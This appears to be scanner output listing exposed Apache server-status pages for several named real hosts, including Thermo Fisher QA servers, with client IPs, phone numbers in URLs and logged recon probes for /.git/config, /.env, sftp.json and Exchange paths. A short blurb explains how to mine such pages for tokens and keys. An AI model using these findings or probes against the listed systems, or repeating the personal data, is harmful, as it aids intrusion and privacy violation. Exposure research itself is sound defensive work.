2-0517550/858/103204_ 130.960730.024.213330.72 2.18.255.73http/1.1 2-0517550/833/102666_ 131.14000.033.373174.36 2.18.255.73http/1.1 2-0517550/844/103060_ 130.960690.025.363188.87 2.18.255.73http/1.1 2-0517550/830/102752_ 131.43000.018.393309.79 2.18.255.105http/1.1localhost:80GET /.DS_Store HTTP/1.1 2-0517550/851/102709_ 131.15090.035.193309.72 2.18.255.73http/1.1 2-0517550/830/102524_ 131.10100.020.519564.19 2.18.255.105http/1.1 2-0517550/850/102897_ 131.091110.024.783478.47 2.18.255.105http/1.1 2-0517550/828/102743_ 131.0712630.016.443323.71 2.18.255.73http/1.1 2-0517550/835/102501_ 131.071750.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ca0a1328ca0a132816f2c1ab
Apache Status Apache Server Status for clients.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Thursday, 29-Sep-2022 03:13:14 UTC Restart Time: Tuesday, 19-Jul-2022 06:05:20 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 71 days 21 hours 7 minutes 53 seconds Server load: 0.09 0.38 0.51 Total accesses: 20259722 - Total Traffic: 725.4 GB CPU Usage: u3377.54 s368.33 cu0 cs0 - .0603% CPU load 3.26 requests/sec - 122.5 kB/second - 37.5 kB/request 12 requests currently being processed, 168 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 040447no5yes216021 194454no0yes018000 251755no0yes018000 461164no2yes315002 546522no1yes018001 6125153no0yes315000 7110199no0yes117000 899710no8yes117026 9100664no1yes117000 1085785no1yes117001 Sum10018 121680411 __R___________W_______________________________________.......... ........__R___W________R_____________________________R______RR__ ________R___________________R________R______________R___________ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0404470/370/94001_ 33.950120.09.003072.14 2.18.255.140http/1.1 0-0404470/385/94020_ 33.99000.08.093027.15 207.154.241.99http/1.1localhost:80HELP 0-0404470/380/93836R 33.910160.04.093042.68 2.18.255.73http/1.1crm.textripple.com:443 0-0404470/373/93642_ 34.02000.09.843106.87 207.154.241.99http/1.1client.simplismarter.com:80GET /config.json HTTP/1.1 0-0404470/391/93880_ 33.960800.05.439251.75 2.18.255.56http/1.1 0-0404470/376/93692_ 33.920200.07.313136.39 2.18.255.140http/1.1 0-0404470/363/93809_ 34.0101620.03.253033.50 2.18.255.56http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0404470/377/93918_ 33.940800.02.503105.24 2.18.255.56http/1.1 0-0404470/380/93923_ 33.93000.05.483111.28 2.18.255.140http/1.1 0-0404470/389/93742_ 33.910170.017.613204.24 2.18.255.56http/1.1 0-0404470/390/93850_ 33.99000.014.032995.42 2.18.255.140http/1.1trmm.us:443GET / HTTP/1.1 0-0404470/369/93882_ 33.950100.010.282985.03 2.18.255.56http/1.1 0-0404470/382/93859_ 33.880810.05.043027.44 188.166.147.46http/1.1 0-0404470/395/93660_ 33.980100.05.003032.88 188.166.147.46http/1.1localhost:443HELP 0-0404470/387/93926W 33.91000.011.832988.41 2.18.255.73http/1.1crm.textripple.com:443GET /server-status HTTP/1.1 0-0404470/384/93625_ 33.93000.04.873182.69 2.18.255.140http/1.1 0-0404470/389/93794_ 33.96000.06.803015.32 188.166.147.46http/1.1 0-0404470/378/93869_ 33.8402280.09.413060.00 2.18.255.56http/1.1 1-0944540/427/98988_ 86.750140.013.703174.88 2.18.255.56http/1.1 1-0944540/425/99008_ 86.391031150.018.053230.87 127.0.0.1http/1.1 1-0944540/409/98769_ 86.59137160.012.153192.26 127.0.0.1http/1.1 1-0944540/418/98444_ 86.881910.014.533256.26 139.162.7.175http/1.1trmm.us:443HEAD / HTTP/1.1 1-0944540/420/98864_ 86.89600.015.899440.25 2.18.255.140http/1.1localhost:80HEAD / HTTP/1.1 1-0944540/421/98725_ 86.4918150.015.713139.65 139.162.7.175http/1.1 1-0944540/430/98937_ 86.74010.05.733143.20 2.18.255.140http/1.1 1-0944540/428/99016_ 86.78125180.012.173122.97 23.54.163.142http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/429/99145_ 86.7415130.010.383174.74 127.0.0.1http/1.1 1-0944540/442/98816_ 86.8635720.015.313112.75 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/427/98656_ 86.8186140.023.983228.60 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 1-0944540/422/98985_ 86.8010500.019.373343.64 96.7.74.175http/1.1trmm.us:443GET /public/mms/20220925_111411_UTC_68d8ab3cc8_0.jpeg HTTP/1.1 1-0944540/430/99133_ 86.77126140.014.583314.31 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/414/99182_ 86.4456120.024.323260.74 127.0.0.1http/1.1 1-0944540/417/98922_ 86.75154740.05.693206.38 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/428/98749_ 86.771311590.011.119424.45 184.31.0.223http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/434/98932_ 86.76138150.017.253208.65 23.54.163.142http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/440/99071_ 86.8010320.021.763257.09 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-0517550/835/102871_ 131.0442170.020.583216.97 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0517550/855/102726_ 130.8528180.032.213162.47 127.0.0.1http/1.1 2-0517550/832/102937_ 130.5776170.028.383393.79 127.0.0.1http/1.1 2-0517550/825/102950_ 131.062810.020.353177.55 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-0517550/812/102770_ 131.025900.023.903349.39 79.104.53.14http/1.1trmm.us:80GET / HTTP/1.1 2-0517550/819/103075_ 131.0442840.024.553310.70 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0517550/821/102792_ 130.96122910.035.343287.32 172.58.122.91http/1.1veew.info:443GET /?2cY&phn=5863397195 HTTP/1.1 2-0517550/858/103204_ 130.96121730.024.213330.72 172.58.122.91http/1.1veew.info:443POST /ajax.php HTTP/1.1 2-0517550/832/102665_ 130.93141160.033.373174.35 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0517550/844/103060_ 130.96121690.025.363188.87 172.58.122.91http/1.1veew.info:443POST /ajax.php HTTP/1.1 2-0517550/829/102751_ 131.0077790.018.393309.79 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0517550/850/102708_ 130.9116100.035.173309.71 59.36.175.46http/1.1thpierpc.com:80GET / HTTP/1.1 2-0517550/830/102524_ 131.10000.020.519564.19 207.154.241.99http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ca0a1328ca0a1328ff41d73a
Apache Status Apache Server Status for clients.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Saturday, 02-Jul-2022 17:13:44 UTC Restart Time: Friday, 20-May-2022 14:49:05 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 43 days 2 hours 24 minutes 38 seconds Server load: 0.58 1.14 0.95 Total accesses: 11911583 - Total Traffic: 388.3 GB CPU Usage: u2883.86 s296.46 cu0 cs0 - .0854% CPU load 3.2 requests/sec - 109.3 kB/second - 34.2 kB/request 28 requests currently being processed, 152 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 1111644no28no1440106 222903no4yes018020 3107167no4yes018013 4112229no4yes315011 5121144no7yes018041 667151no12yes414035 918565no6yes414011 1136524no6yes216003 1436768no1yes117001 1542031no1yes018010 Sum10073 2815202321 .................._RRRRRRR_RRR_RR_RR____________________________ ___________R___R______R_____________________R_R____R____R_____.. ..................................______R_____R_R__W............ ......_____R______W_____....................................____ W_______________________________................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0-0/0/54446. 188.421777160.00.001872.59 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0-0/0/54506. 188.371777230.00.001628.05 172.58.189.143http/1.1veew.info:443GET /js/jquery.mobile-1.3.0.min.js HTTP/1.1 0-0-0/0/54365. 188.39177700.00.001762.16 51.222.253.12http/1.1veew.info:443GET /robots.txt HTTP/1.1 0-0-0/0/54403. 188.461777100.00.001798.21 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0-0/0/54474. 188.351777110.00.001693.13 172.58.189.143http/1.1veew.info:443GET /css/jquery.mobile-1.3.0.min.css HTTP/1.1 0-0-0/0/54340. 188.191777560.00.001621.90 51.222.253.12http/1.1 0-0-0/0/54720. 188.3017771370.00.001745.04 127.0.0.1http/1.1 0-0-0/0/54371. 188.421777540.00.001721.29 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax_lylt.php HTTP/1.1 0-0-0/0/54491. 188.431777140.00.001605.33 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0-0/0/54383. 188.431777300.00.001718.61 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 0-0-0/0/54484. 188.3817771800.00.001766.88 172.58.189.143http/1.1veew.info:443GET /loader.gif HTTP/1.1 0-0-0/0/54375. 188.421777200.00.001645.23 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0-0/0/54318. 188.38177720.00.001768.49 172.58.189.143http/1.1veew.info:443GET /js/validate-1.2.js HTTP/1.1 0-0-0/0/54533. 188.441777150.00.001721.76 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0-0/0/54341. 188.38177740.00.001737.58 172.58.189.143http/1.1veew.info:443GET /js/bootstrap-3.3.7.min.js HTTP/1.1 0-0-0/0/54402. 188.341777740.00.001704.82 172.58.189.143http/1.1veew.info:443GET /?1Fr&phn=2025208103 HTTP/1.1 0-0-0/0/54446. 188.43177716840.00.001695.81 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 0-0-0/0/54331. 188.171777240.00.001783.76 172.58.189.143http/1.1 1-01116440/248/55613_ 22.53000.013.151759.69 95.101.88.100http/1.1 1-01116440/246/55314R 22.46010.012.691702.84 95.101.88.126http/1.1 1-01116440/247/55452R 22.36000.07.411705.27 95.101.88.126http/1.1 1-01116440/226/55467R 22.55000.07.371786.49 95.101.88.100http/1.1 1-01116440/228/55422R 22.62000.06.747937.64 96.7.74.175http/1.1crm.sprout.online:80GET /langs HTTP/1.1 1-01116440/253/55492R 22.54000.01.541725.60 95.101.88.126http/1.1 1-01116440/237/55538R 22.56000.010.151685.08 95.101.88.126http/1.1 1-01116440/230/55679R 22.62000.09.701649.16 96.7.74.198http/1.1crm.sprout.online:80GET /akismet HTTP/1.1 1-01116440/242/55835_ 22.48000.02.761730.20 95.101.88.126http/1.1 1-01116440/239/55604R 22.54000.04.121667.85 95.101.88.126http/1.1 1-01116440/240/55674R 22.60000.06.957903.58 96.7.74.198http/1.1crm.sprout.online:80GET /css HTTP/1.1 1-01116440/247/55413R 22.45000.04.211690.66 95.101.88.126http/1.1crm.textripple.com:443 1-01116440/239/55449_ 22.46000.09.401606.63 95.101.88.100http/1.1 1-01116440/233/55360R 22.62000.09.541786.53 96.7.74.198http/1.1crm.sprout.online:80GET /views HTTP/1.1 1-01116440/230/55272R 22.49000.04.181645.65 95.101.88.126http/1.1 1-01116440/245/55602_ 22.63000.013.011701.07 95.101.88.126http/1.1crm.textripple.com:443GET /videos/.DS_Store HTTP/1.1 1-01116440/241/55290R 22.55000.01.661699.33 95.101.88.100http/1.1 1-01116440/235/55349R 22.59000.08.211679.76 96.7.74.175http/1.1crm.sprout.online:80GET /sqlsrv HTTP/1.1 2-0229030/822/59596_ 109.93010.036.611946.19 96.7.74.165http/1.1localhost:80GET / HTTP/1.1 2-0229030/859/59771_ 109.760160.045.221932.58 95.101.88.100http/1.1 2-0229030/822/59553_ 109.821160.051.801915.17 95.101.88.77http/1.1 2-0229030/858/60103_ 109.93000.049.341712.93 95.101.88.126http/1.1crm.textripple.com:443GET /lib/.DS_Store HTTP/1.1 2-0229030/850/59818_ 109.93100.044.241872.87 96.7.74.165http/1.1localhost:80GET / HTTP/1.1 2-0229030/819/59819_ 109.92010.045.341928.60 95.101.88.100http/1.1 2-0229030/839/59997_ 109.810170.045.231876.02 95.101.88.100http/1.1 2-0229030/842/59781_ 109.96010.048.081881.13 95.101.88.126http/1.1crm.textripple.com:443GET /pdfs/.DS_Store HTTP/1.1 2-0229030/811/59780_ 109.870200.062.181860.43 95.101.88.100http/1.1 2-0229030/837/59810_ 110.01000.049.021853.86 95.101.88.126http/1.1crm.textripple.com:443GET /.git/config HTTP/1.1 2-0229030/838/59649_ 109.91000.054.491908.23 95.101.88.100http/1.1 2-0229030/862/59892_ 109.91000.030.271826.50 95.101.88.100http/1.1 2-0229030/811/59582_ 109.820190.039.92
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ca0a1328ca0a132894c1c1ee
Apache Status Apache Server Status for clients.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Saturday, 02-Jul-2022 17:13:42 UTC Restart Time: Friday, 20-May-2022 14:49:05 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 43 days 2 hours 24 minutes 36 seconds Server load: 0.58 1.14 0.95 Total accesses: 11911401 - Total Traffic: 388.3 GB CPU Usage: u2882.49 s296.34 cu0 cs0 - .0854% CPU load 3.2 requests/sec - 109.3 kB/second - 34.2 kB/request 29 requests currently being processed, 151 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 1111644no17yes810082 222903no2yes216000 3107167no5yes117021 4112229no4yes216011 5121144no8yes315032 667151no6yes513011 918565no4yes216011 1136524no7yes414011 1436768no2yes018011 1542031no2yes216000 Sum10057 2915101810 .................._R____R__RRW__RW_R_______R_____R______________ _R________R______R__________________RR_R_____R_________RR_R_R_.. ..................................W___R_____________............ ......R__RR__R__________....................................____ ______________________________RW................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0-0/0/54446. 188.421774160.00.001872.59 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0-0/0/54506. 188.371774230.00.001628.05 172.58.189.143http/1.1veew.info:443GET /js/jquery.mobile-1.3.0.min.js HTTP/1.1 0-0-0/0/54365. 188.39177400.00.001762.16 51.222.253.12http/1.1veew.info:443GET /robots.txt HTTP/1.1 0-0-0/0/54403. 188.461774100.00.001798.21 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0-0/0/54474. 188.351774110.00.001693.13 172.58.189.143http/1.1veew.info:443GET /css/jquery.mobile-1.3.0.min.css HTTP/1.1 0-0-0/0/54340. 188.191774560.00.001621.90 51.222.253.12http/1.1 0-0-0/0/54720. 188.3017741370.00.001745.04 127.0.0.1http/1.1 0-0-0/0/54371. 188.421774540.00.001721.29 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax_lylt.php HTTP/1.1 0-0-0/0/54491. 188.431774140.00.001605.33 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0-0/0/54383. 188.431774300.00.001718.61 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 0-0-0/0/54484. 188.3817741800.00.001766.88 172.58.189.143http/1.1veew.info:443GET /loader.gif HTTP/1.1 0-0-0/0/54375. 188.421774200.00.001645.23 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0-0/0/54318. 188.38177420.00.001768.49 172.58.189.143http/1.1veew.info:443GET /js/validate-1.2.js HTTP/1.1 0-0-0/0/54533. 188.441774150.00.001721.76 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0-0/0/54341. 188.38177440.00.001737.58 172.58.189.143http/1.1veew.info:443GET /js/bootstrap-3.3.7.min.js HTTP/1.1 0-0-0/0/54402. 188.341774740.00.001704.82 172.58.189.143http/1.1veew.info:443GET /?1Fr&phn=2025208103 HTTP/1.1 0-0-0/0/54446. 188.43177416840.00.001695.81 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 0-0-0/0/54331. 188.171774240.00.001783.76 172.58.189.143http/1.1 1-01116440/247/55612_ 22.240810.013.151759.69 95.101.88.77http/1.1crm.sprout.online:443GET / HTTP/1.1 1-01116440/244/55312R 22.13050.012.651702.80 95.101.88.100http/1.1 1-01116440/246/55451_ 22.070260.07.411705.27 164.92.240.121http/1.1 1-01116440/222/55463_ 22.24000.07.361786.48 95.101.88.100http/1.1crm.sprout.online:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-01116440/227/55421_ 22.170170.06.747937.64 95.101.88.77http/1.1 1-01116440/250/55489_ 22.24010.01.541725.60 95.101.88.126http/1.1crm.sprout.online:443GET /.git/config HTTP/1.1 1-01116440/232/55533R 22.19000.010.131685.07 95.101.88.100http/1.1 1-01116440/223/55672_ 22.08020.09.701649.15 95.101.88.45http/1.1 1-01116440/241/55834_ 22.240140.02.761730.20 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-01116440/236/55601R 22.032120.04.101667.82 195.211.77.140http/1.1 1-01116440/238/55672R 22.15000.06.957903.58 95.101.88.77http/1.1 1-01116440/242/55408W 22.19000.04.141690.59 95.101.88.100http/1.1crm.sprout.online:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-01116440/232/55442_ 22.16010.09.391606.62 95.101.88.77http/1.1 1-01116440/227/55354_ 22.190100.09.521786.51 95.101.88.45http/1.1 1-01116440/226/55268R 22.190820.04.171645.64 95.101.88.126http/1.1 1-01116440/241/55598W 22.02100.010.291698.34 172.10.230.28http/1.1veew.info:443GET /loader.gif HTTP/1.1 1-01116440/234/55283_ 22.110210.01.641699.31 95.101.88.77http/1.1 1-01116440/230/55344R 22.120200.08.181679.74 95.101.88.126http/1.1 2-0229030/821/59595_ 109.75231520.036.611946.19 127.0.0.1http/1.1 2-0229030/859/59771_ 109.767160.045.221932.58 95.101.88.77http/1.1 2-0229030/822/59553_ 109.8236160.051.801915.17 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 2-0229030/857/60102_ 109.842100.049.341712.93 96.7.74.198http/1.1trmm.us:443GET /public/mms/20220518_184039_UTC_de12aa846d_0.png HTTP/1.1 2-0229030/849/59817_ 109.833213520.044.241872.87 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax_lylt.php HTTP/1.1 2-0229030/818/59818_ 109.8237140.045.341928.60 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 2-0229030/839/59997_ 109.8142170.045.231876.02 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0229030/840/59779R 109.8043160.048.071881.12 95.101.88.100http/1.1 2-0229030/811/59780_ 109.876200.062.181860.43 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0229030/835/59808_ 109.8237670.049.021853.85 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 2-0229030/837/59648_ 109.8142150.054.491908.23 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0229030/861/59891</
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3100acbc1d00acbc1d3dacaa64
Apache Status Apache Server Status for qa1.onelambda.com (via 10.253.99.247) Server Version: Apache/2.4.56 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Mar 15 2023 20:56:52 Current Time: Thursday, 11-May-2023 06:45:08 EDT Restart Time: Tuesday, 09-May-2023 17:47:59 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 1 day 12 hours 57 minutes 8 seconds Server load: 0.08 0.02 0.01 Total accesses: 40206 - Total Traffic: 406.9 MB - Total Duration: 1975238 CPU Usage: u11.05 s16.07 cu37.13 cs10.32 - .0561% CPU load .302 requests/sec - 3207 B/second - 10.4 kB/request - 49.1279 ms/request 41 requests currently being processed, 34 idle workers KKKKK_K_R__KRW___W____R_R___RRRR__R__R__RR__R____KR_______.RK.RR R.RRR.RR.RK..RRR...................................RR........... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-03154620/24/236K 0.02052223729.80.036.80 10.253.106.133http/1.1qa1-chemicals.thermofisher.co.kGET /.vscode/sftp.json HTTP/1.1 1-0414424/24/186K 0.0217381932.80.031.27 10.253.106.133http/1.1www-qa.patheon.cn:80GET /.env HTTP/1.1 2-0293913303/13303/13303K 7.8850789820127.919.6619.66 10.253.106.167http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 3-0294013303/13303/13303K 7.2050740520127.919.6619.66 10.253.106.133http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 4-041454/4/164K 0.00210311105.90.013.15 10.253.106.167http/1.1www-qa.patheon.jp:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 5-016750/14/186_ 0.0133196680.00.021.38 10.253.106.133http/1.1qa1-chemicals.thermofisher.co.kGET /.git/config HTTP/1.1 6-03155011/13/232K 0.01431603620.00.022.76 10.253.106.167http/1.1www-qa.patheon.kr:80GET /server-status HTTP/1.1 7-0246320/11/179_ 0.013531090.00.035.60 10.253.106.167http/1.1www-qa.patheon.kr:80GET /.git/config HTTP/1.1 8-016810/0/210R 0.006720153590.00.004.49 10.253.106.133http/1.1 9-041460/2/226_ 0.00211209190.00.004.14 10.253.106.133http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 10-0180450/46/237_ 0.27029233700.00.912.04 10.253.106.167http/1.1www-qa.patheon.jp:80GET /.git/config HTTP/1.1 11-0414714/14/204K 0.000102912817.90.022.19 10.253.106.167http/1.1qa1-chemicals.thermofisher.co.kGET /about HTTP/1.1 12-0315560/16/184R 0.006720219860.00.044.66 10.253.106.167http/1.1 13-041480/0/262W 0.0000438960.00.002.32 10.253.106.167http/1.1qa1.onelambda.com:80GET /server-status HTTP/1.1 14-041490/13/212_ 0.00026500930.00.021.75 10.253.106.133http/1.1qa1.onelambda.com:80GET /.git/config HTTP/1.1 15-0327570/32/244_ 0.05225100840.00.139.04 10.253.106.167http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 16-017760/33/262_ 0.02140102760.00.043.42 10.253.106.133http/1.1www-qa.patheon.cn:80GET /.git/config HTTP/1.1 17-041501/1/144W 0.0000292090.70.002.13 10.253.106.133http/1.1qa1.onelambda.com:80GET /s/2343e2738313e26313e223/_/;/META-INF/maven/com.atlassian. 18-041540/0/187_ 0.0030254780.00.006.38 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 19-0327590/5/137_ 0.002022630.00.001.26 10.253.106.167http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 20-041550/0/160_ 0.0030270590.00.003.90 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 21-041560/0/170_ 0.003030850.00.002.53 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 22-017890/0/163R 0.00671041670.00.002.26 10.253.106.133http/1.1 23-041570/0/176_ 0.0030153860.00.005.56 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 24-0283220/9/224R 0.027021797100.00.182.70 10.253.106.167http/1.1 25-041580/0/175_ 0.0030326180.00.002.05 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 26-041590/0/170_ 0.0030339800.00.002.61 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 27-041600/0/272_ 0.0030360040.00.0016.18 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 28-023220/2/139R 0.0012353889728360.00.151.94 10.253.106.167http/1.1 29-0296010/22/222R 0.029760144790.01.223.39 10.253.106.167http/1.1 30-0327600/0/247R 0.00672083480.00.0010.55 10.253.106.133http/1.1 31-0288110/2/205R 0.007024146860.00.004.57 10.253.106.167http/1.1 32-041610/0/218_ 0.0030267330.00.0022.42 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 33-041620/0/247_ 0.0020245750.00.003.49 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 34-0320970/1/221R 0.00719067230.00.009.95 10.253.106.133http/1.1 35-041630/0/163_ 0.0020313290.00.004.76 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 36-041640/0/200_ 0.002042240.00.002.58 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 37-0288260/24/232R 0.049718802580630.00.12102.29 10.253.106.133http/1.1 38-041650/0/146_ 0.002087990.00.001.62 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 39-041660/0/173_ 0.0020297760.00.001.90 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 40-04860/8/193R 0.006710164090.00.013.48 10.253.106.133http/1.1 41-023230/5/153R 0.0497710197100.00.131.58 10.253.106.167http/1.1 42-023240/36/151_ 0.0345192190.00.060.81 10.253.106.167http/1.1qa1-chemicals.thermofisher.co.kGET /.git/config HTTP/1.1 43-041670/0/156_ 0.002089950.00.003.67 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 44-023250/1/158R 0.0010346715342510.00.021.73 10.253.106.133http/1.1 45-041680/0/170_ 0.0020446410.00.002.90 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 46-023260/22/239_ 0.02338280510.00.241.49 10.253.106.133http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 47-041690/0/139_ 0.0020446900.00.002.53 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 48-041700/0/105_ 0.0020216720.00.000.91 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 49-0200771/12/200K 0.0260191460.90.443.84 10.253.106.167http/1.1www-qa.patheon.jp:80GET / HTTP/1.1 50-0321120/0/184R 0.00719058470.00.002.23 10.253.106.167http/1.1 51-041710/0/194_ 0.0020421000.00.003.67 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 52-041720/0/156_ 0.0020</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3100acbc1d00acbc1d2e8ce0a9
